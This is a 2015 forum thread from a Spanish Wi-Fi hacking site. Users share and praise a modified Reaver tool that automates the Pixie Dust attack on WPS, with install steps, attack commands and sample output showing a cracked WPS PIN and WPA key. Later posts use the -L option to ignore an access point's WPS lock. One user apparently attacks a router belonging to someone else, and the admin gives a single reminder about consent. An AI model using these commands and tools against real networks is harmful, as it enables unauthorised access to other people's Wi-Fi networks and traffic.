Reaver modificado para Pixie Dust (Pagina 1) / Las herramientas para attaque WPS / Foro Wifi-libre.com

El libre pensamiento para un internet libre

No estas registrado.     

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

#1 13-04-2015 05:51:06

t6_x
Usuario

Registrado: 13-04-2015
Mensajes: 6

Reaver modificado para Pixie Dust

Hello

I made a modification to reaver for him to do the pixiedust when testing a pin number

Here's my contribution

GitHub

https://github.com/t6x/reaver-wps-fork-t6x


Example


Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]>

[+] Switching mon0 to channel 1
[?] Restore previous session for A.:9.:D.:....:....:...? [n/Y] n
[+] Waiting for beacon from A.:9.:D.:....:....:...
[+] Associated with A.:9.:D.:....:....:.... (ESSID: ......)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: c6:66:a6:72:37:6d:........
[P] PKE: 10:cf:cc:88:99:4b:15:de:a6:b3:26:fe:93:24:........
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Number: RT2860
[+] Received M1 message
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:........
[P] AuthKey: bf:68:34:b5:ce:e2:a1:24:dc:15:01:1c:78:9e:74:.......
[+] Sending M2 message
[P] E-Hash1: 2e:d5:17:16:36:b8:c2:bb:d1:14:7c:18:cf:89:58:b8:1d:9d:39:......
[P] E-Hash2: 94:fb:41:53:55:b3:8e:1c:fe:2b:a3:9b:b5:82:11:......
[Pixie-Dust]
[Pixie-Dust]   [*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust]   [*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust]   [*] PSK1: dd:09:bd:24:..........
[Pixie-Dust]   [*] PSK2: 77:e0:dd:00:........
[Pixie-Dust]   [+] WPS pin: 9178....
[Pixie-Dust]
[Pixie-Dust]   [*] Time taken: 0 s
[Pixie-Dust]
Running the reaver with the correct pin wait ...

[Reaver Test] BSSID: A.:9.:D.:3.:..:..
[Reaver Test] Channel: 1
[Reaver Test] [+] WPS PIN: '9178....'
[Reaver Test] [+] WPA PSK: '112233'
[Reaver Test] [+] AP SSID: '....'

Any problem or suggestion please contact me

Desconectado

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

#2 13-04-2015 09:22:08

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 2,069

Re: Reaver modificado para Pixie Dust

Muy buenos días t6_x smile
¡Excelente aporte!
Muchas Gracias a ti  por venir registrarte aquí y compartir con [email protected] tu versión de reaver  modificado para el ataque pixie dust smile
Funciona muy bien y es de lo más  cómodo big_smile

Hello t6_x smile
WoW this is absolutly excelent
Thank you very much for sharing with us your modified reaver! smile
It works perfectly and is the most convenient toll with the PKR dipslayed live and the -K option for auto-pixie dust cool
We love you! big_smile


Instalación del reaver modificado por t6_x

  Podemos descargar las fuentes desde la pagina github puesta en link previamente por t6_x: reaver-wps-fork-t6x (GitHub) o bien hacer lo así en linea de comando :

wget https://github.com/t6x/reaver-wps-fork-t6x/archive/master.zip

descomprimimos el fichero

unzip master.zip

Normalemente se ha creado una carpeta "reaver-wps-fork-t6x-master". No situamos en el directorio src que contiene :

cd reaver-wps-fork-t6x-master && cd src

lanzamos la compilación con

./configure

seguido por

make

Y por fin instalamos con

sudo make install

Podéis "aplastar" vuestra instalación previa de reaver (no hace falta des-instalar vuestro reaver "convencional")

Ejemplo de uso

¡Es genial! cool
si examinamos las opciones podemos ver un nuevo argumento : -K

-K, --pixie-dust                Test Pixie Dust [1] Basic(-S) [2] With E-Once(-S) [3] With PKR

Tenemos tres modos de ejecución posibles:

  1. Modo Basico : se usa cuando hemos decidido optar por llaves Diffie-Hellman cortas (opción -S en nuestro comando reaver) y se puede usar contra chipset Ralink y Broadcom

  2. Modo E-nonce : es el modo a usar contra chipset realteck

  3. Modo PKR : Es el modo a usar cuando el intercambio de diffie hellmann pequeñas no se puede emplear (como pasa con realteck si no conseguimos mandar el PIN en un segundo o menos

Este nuevo argumento lo cambia todo smile

Ataque pixie dust automatizado para una velocidad de formula uno

pruebo una sintaxis reaver para una velocidad optima ( -d 0 + -S )

¡Alucinante! big_smile
Tiempo total para obtener el PIN : menos de 2 segundos cool


reaver_th6c_1.jpg



de paso podemos ver que se enseñan y la PKR y el e-nounce : reaver_th6c_2.jpg

Y además vuelve automáticamente a tirar de reaver para obtener la llave WPA... resumen y instalación paso a paso en imágenes....
  Poner la calidad HD 720 a mano sino sale borroso tongue

THANK YOU SO MUCH t6_x

Una chincheta para este tema smile

Desconectado

#3 13-04-2015 22:40:54

1camaron1
Very Important Usuario

Registrado: 30-03-2015
Mensajes: 12

Re: Reaver modificado para Pixie Dust

Wooow.. muchas gracias! muy buen aporte! smile plus_un

Desconectado

#4 14-04-2015 01:35:16

t6_x
Usuario

Registrado: 13-04-2015
Mensajes: 6

Re: Reaver modificado para Pixie Dust

hola

Vi la foto con un pequeño error ("sh: 1: ./reaver: not found")

Lo siento por eso, me olvidé de hacer la "commit" en github. : /

Pero ya efetuei la "commit" y ya dispuesta otros problemas pequeños.

Inserte un nuevo argumento (-Z) para no hacer el "reaver" de nuevo y detener sólo en pixiedust, a veces es necesario

Una vez más, pido disculpas por el pequeño problema.

Voy a seguir modificando la herramienta hasta que sea más práctico, el uso en celular y es difícil seguir escribiendo todas esas líneas

Cualquier problema que encuentran, no exitem para abrir una aplicación en github, es más rápido para mí ver y ordenado.


adiós

Ultima edición por t6_x (14-04-2015 04:55:19)

Desconectado

#5 14-04-2015 16:32:21

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 2,069

Re: Reaver modificado para Pixie Dust

Vi la foto con un pequeño error ("sh: 1: ./reaver: not found")

Es que he usado en la foto el argumento "-g 1" que parra reaver después el primer intento porque quería ver el tiempo para obtener los hashes y generar el PIN

Inserte un nuevo argumento (-Z) para no hacer el "reaver" de nuevo y detener sólo en pixiedust, a veces es necesario

¡Perfecto! A partir de ahora lo usare si solo quiero obtener el PIN
Muy buena idea  cool

Una vez más, pido disculpas por el pequeño problema.

No es un "problema" solo un detalle para el stdout.;)
Pero tienes razón en querer hacer las cosas bien. Si veo "errores" de este tipo te los señalare  wink

Cualquier problema que encuentran, no exitem para abrir una aplicación en github, es más rápido para mí ver y ordenado.

Claro.
No te preocupes: informaré aquí los usuarios sobre tus últimos desarrollos y  te pasare por github los fallos y sugestiones de lo usuarios
Puedes poner un simple post tipo "nueva actualización" y iré a mirrar y daré explicaciones en español.
  Nos vemos ahi que me gustaría proponerte modifcar wash para òner en salida el taged parameter que permite identifcar el chipset wifi del dispositivo / el modelo
Por defcto el stdout de wash es sobre dos liñas

$BSSID   $RSSI  $CHANNEL $LOCKED $VERSION
$ESSID 

la idea sería tenr un stdout asi

$BSSID $RSSI $CHANNEL $LOCKED $VERSION
$ESSID ($Chipet $model)*

* if available

saludos

Desconectado

#6 14-04-2015 20:09:24

t6_x
Usuario

Registrado: 13-04-2015
Mensajes: 6

Re: Reaver modificado para Pixie Dust

Muy buena idea

Existe el problema de tiempo que puede tomar

A menudo, el router hasta aquí y te lleva mucho tiempo para levantarse msg M1

Voy a tratar de pensar en algo, vamos a hablar de una buena solución

Lamento Traducción, estoy utilizando el traductor de google

Desconectado

#7 15-04-2015 04:45:50

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 2,069

Re: Reaver modificado para Pixie Dust

Modificación de datahead la noche pasada en la cual podemos ver una interesante nueva opción

+			-P, --pixiepust-loop            Set Into PixieLoop mode ( doesnt send M4, and loops through to M3 [False]

Excelente noticia...
Nos paramos al M4 lo que haría nuestro ataque "invisible" para el bloqueo del Punto de acceso ( AP rate limit )
¡Esto se pone más fino cada día! big_smile

Desconectado

#8 15-04-2015 09:40:41

t6_x
Usuario

Registrado: 13-04-2015
Mensajes: 6

Re: Reaver modificado para Pixie Dust

Opción -g lanzado en el wash

-g, --get-chipset                    Output Piped and tries to read the chipset with reaver

Ejemplo

# wash -i mon0 -g -c 2
XX:XX:XX:XX:XX:XX| 1|-68|1.0|No |AAA| D-Link| DIR-615
XX:XX:XX:XX:XX:XX| 1|-58|1.0|No |CCC| ASUSTeK Computer Inc.| RT-N56U

Gracias por la sugerencia kcdtv, les agregué a créditos

Ultima edición por t6_x (15-04-2015 09:45:15)

Desconectado

#9 15-04-2015 14:33:43

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 2,069

Re: Reaver modificado para Pixie Dust

WoW...
....Cada día tenemos una nueva sorpresa contigo! big_smile
¡Genial! : Le estas devolviendo colores a nuestro querido reaver.
¡Miles de Gracias para todo!

"for the record"....

reaver_th6c_3.jpg

Por los que no saben quien es g0tm1k, se trata nada más ni menos que de uno de de los pilares de kali linux (de hecho es administrador del foro Kali linux)  smile

Desconectado

#10 22-04-2015 16:04:31

dynyly
Usuario

Registrado: 19-04-2015
Mensajes: 209

Re: Reaver modificado para Pixie Dust

gracias por compartir conocimientos
he intentado echar a andar el reaver modificado y no hay manera lo intento desde wifislax
; he probado de todas las maneras que conozco con el en escritorio
cd Desktop

cd cd reaver-wps-fork-t6x-master
cd src 
cd reaver-wps-fork-t6x-master && cd src
reaver-wps-fork-t6x-master: No existe el fichero o el directorio

-----------------------------

cd /root/Desktop/reaver-wps-fork-t6x-master/
cd reaver-wps-fork-t6x-master && cd src
reaver-wps-fork-t6x-master: No existe el fichero o el directorio

------------------------
le meto direcciones

cd /root/Desktop/reaver-wps-fork-t6x-master/src/reaver-wps-fork-t6x-master && cd src 

; y tampoco
tambien hago lo de abrir terminal aqui sobre la carpeta src y ejecuto comandos del tuto y nada
¿hago algo mal? ¿es solo para kali? 
saludos

Desconectado

#11 22-04-2015 21:27:16

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 2,069

Re: Reaver modificado para Pixie Dust

No es solo para kali, de hecho no lo he instalado en kali aún, lo hago todo desde xubuntu.
Esto si: esta diseñado para distribuciones GNU Linux bazadas en debian y no para distribuciones bazadas en slackware

tambien hago lo de abrir terminal aqui sobre la carpeta src y ejecuto comandos del tuto y nada

Muy extraño. hmm
un error con "cd ruta_archivo" puede ocurrir al escribir mal una letra...
... Pero haciendo click derecha en la carpeta descomprimida no hay fallos posibles hmm
Deberías abrir un tema en el foro de soporte de tu distribución o en un foro dedicado a slackware..

Desconectado

#12 28-04-2015 20:55:36

mitxan
Usuario

Registrado: 30-03-2015
Mensajes: 8

Re: Reaver modificado para Pixie Dust

Gracias por el aporte , vamos a probarlo

Ultima edición por mitxan (28-04-2015 21:02:04)

Desconectado

#13 03-05-2015 09:49:15

saturno
Expulsado

Registrado: 27-04-2015
Mensajes: 48

Re: Reaver modificado para Pixie Dust

lo mejor sacar clave con el wps bloqueado con pixiewps

reaver -i mon0 -b 00:AA:BB:11:22:33 -L -vv -K 1

ya sabeis que el reaver trae -L, --ignore-locks              Ignore locked state reported by the target AP

y el pixiewps se necesita

-e, --pke           : Enrollee public key

-s, --e-hash1       : Enrollee Hash1

-z, --e-hash2       : Enrollee Hash2

-a, --authkey       : Authentication session key

-S, --dh-small      : Small Diffie-Hellman keys (PKr not needed)

pues bien con el reaver poniendo -L

el pixiewps todavia no funciona con todo los router

Ultima edición por saturno (03-05-2015 15:14:55)

Desconectado

#14 03-05-2015 13:44:05

saturno
Expulsado

Registrado: 27-04-2015
Mensajes: 48

Re: Reaver modificado para Pixie Dust

se necesita el reaver modificado para pixiewps

si pones el comando original

reaver -i mon0 -b 00:AA:BB:11:22:33 -vv -K 1

y el wps esta bloqueado se queda

WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking

y el pixiewps no ase nada

pero si lo pones con el mismo comando pero con -L lo que hace es saltarse el bloqueo wps y el pixiewps coge los dato del wps


reaver -i mon0 -b 00:AA:BB:11:22:33 -L -vv -K 1

Desconectado

#15 03-05-2015 14:22:40

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 2,069

Re: Reaver modificado para Pixie Dust

pero si lo pones con el mismo comando pero con -L lo que hace es saltarse el bloqueo wps y el pixiewps coge los dato del wps

Buenas smile
   Una cosa :  no es exactamente como lo describes : 
No se "salta" el bloqueo pero ignora el estado tal cual lo anuncia el router en sus probes (estado 01 = cerrado, estado 02 = abierto )
en lugar de ponerte

WARNING: AP rate limit detected! 

va a seguir intetnbado negociar el PIN
 

Sin -L

1 ) se detecta el bloqueo y se espera un minuto antes de volver a comprobar el estado :

1430658622.png

Con -L

2) Puedes obtener  PKR-PKE y authkey pero no podrás tener un M3 (el router manda un NACK en lugar del M3 despuès M2 << efecto del bloqueo )  y no obtendrás los E-Hash1 y E-Hash2 que son absolutamente necesarios y se contiene en el M3

1430659098.png

Pero si el tuyo reacciona diferentemente (¿has bien mirado que tienes ehash1 Y ehash2?) sería interesante que nos diga de que modelo se trata y nbos des mas detalles sobre el y el ataque ,

saludos

Desconectado

#16 03-05-2015 17:34:16

saturno
Expulsado

Registrado: 27-04-2015
Mensajes: 48

Re: Reaver modificado para Pixie Dust

kcdtv es un router tp-link router con wps bloqueado

e creado un video para que lo veas

descarga video

http://www82.zippyshare.com/v/p4dFgueh/file.html

no funciona con todos los router

Desconectado

#17 03-05-2015 19:18:08

saturno
Expulsado

Registrado: 27-04-2015
Mensajes: 48

Re: Reaver modificado para Pixie Dust

kcdtv  sino funciona el video usa el bsplayer

nose que formato graba el wifislax que no funciona con lo otros reproductores

con el bsplayer si funciona

http://www.bsplayer.com/bsplayer-spanis … 702719d5f5

Desconectado

#18 03-05-2015 22:00:02

mitxan
Usuario

Registrado: 30-03-2015
Mensajes: 8

Re: Reaver modificado para Pixie Dust

Con el VLC tambien se ve el video , eso si , vas a todo correr, jajaja.

Gracias por subirlo

Desconectado

#19 03-05-2015 23:05:52

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 2,069

Re: Reaver modificado para Pixie Dust

plus_un
VLC lo lee todo y ni siquiera necesita codecs,
Es gratis de código libre y aunque empezó como un programa para distribuciones GNU-Linux es multiplataforma.
Esto si un poco "speed" con el vidéo big_smile
sino con parole que tenemos por defecto en xubuntu y otras distribuciones GNU Linux wink

Gracias por el video saturno.
¡Ole! smile
Muy interesante cool
Lo que haría falta, si possible, sería una captura de trafico para mirrar en detalles esto.
Es decir, si no es mucha molestia, lanzas primero airodump-ng en una consola guardando las capturas, en otra consola lanzas reaver para pixie como en el video y cierras la consola airodump-ng o parras el processo con CTRL+C cuando se acaba reaver-pixie.
Y si me puedes pasar el fichero .cap sería genial

pd: puedes subir directamente los ficheros usando el opción "subidas"
1430690775.png

Desconectado

#20 04-05-2015 05:40:57

saturno
Expulsado

Registrado: 27-04-2015
Mensajes: 48

Re: Reaver modificado para Pixie Dust

conseguir el .cap aver si puedo

el router siempre tiene el wps bloqueado nunca lo tiene desbloqueado y el dueño casi nunca esta conectado

haber si puede conseguir .cap con el HANDSHAKE

Desconectado

#21 04-05-2015 09:14:00

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 2,069

Re: Reaver modificado para Pixie Dust

El handshake no interesa... lo que importa es pillar los M (reaver) wink
Te recuerdo que los tests se hacen sobre su punto de acceso o con acuerdo del propietario/adminstrador si no es el tuyo.
saludos.

Desconectado

#22 04-05-2015 10:43:13

saturno
Expulsado

Registrado: 27-04-2015
Mensajes: 48

Re: Reaver modificado para Pixie Dust

si tiene algun fallo melo dices

.cap

http://www57.zippyshare.com/v/hQazoxvv/file.html

Desconectado

#23 04-05-2015 11:54:37

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 2,069

Re: Reaver modificado para Pixie Dust

¡Perfecto! smile
como lo sabemos todos los routers no reaccionan iguales.
Y has puesto el dedo en algo muy interesante, y no solo para pixiewps
Porque podemos imaginar que si el routeur se pone a responder a un M2 con un M3 de vez en cuando, podríamos intentar hundir lo con M2 para ver como reacciona (¿reset del WPS? )
O probar con otro tipos de peticiones con el PIN legitimo obtenido (si se ve el caso con un router soportado)
Con tu permiso me gustaría compartir con soxrok-datahead-ath6 y wiire (los de pixiewps y reaver modificado) estos elementos.
gracias, todo esto es muy interesante wink

Desconectado

#24 04-05-2015 12:20:45

saturno
Expulsado

Registrado: 27-04-2015
Mensajes: 48

Re: Reaver modificado para Pixie Dust

los router movistar no funciona me queda un router  por probar

Desconectado

#25 04-05-2015 14:27:52

thuglife
Usuario

Registrado: 04-05-2015
Mensajes: 5

Re: Reaver modificado para Pixie Dust

Buenas tardes, una vez me he presentado, quería comentar el resultado de este ataque sobre un router con chipset atheros con éxito. Aunque no siempre el resultado era satisfactorio, he visto que reiniciando la señal wifi de este router que conseguia, por ejemplo, yendo a la pagina de configuración y aplicaba cambios (ningun cambio hacia pero provocaba que la señal desapareciera unos segundos) conectándome desde otro ordenador pues al volver a atacar conseguia el pin correcto.
Al segundo ataque y sucesivos no me daba resultado!! No se si es casualidad o que, tengo el .cap, recortes de la pagina de configuración del router y en un .txt  los ataques lanzados con sus respectivos resultados. Todos estos ataques están en ese .cap! Luego mas tarde, sino le sabe mal, se los enviare a kcdtv. Lo intenté hace un rato pero me salió mensaje de no estar registrado. A lo mejor porque tarde tanto en redactar o porque no me presenté. 1 saludo cordial

Desconectado

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

Pie de página

Información del usuario

Ultimo usuario registrado: evam
Usuarios registrados conectados: 0
Invitados conectados: 2

Estadisticas de los foros

Número total de usuarios registrados: 357
Número total de temas: 621
Número total de mensajes: 4,272

Máx. usuarios conectados: 45 el 12-04-2016 12:02:20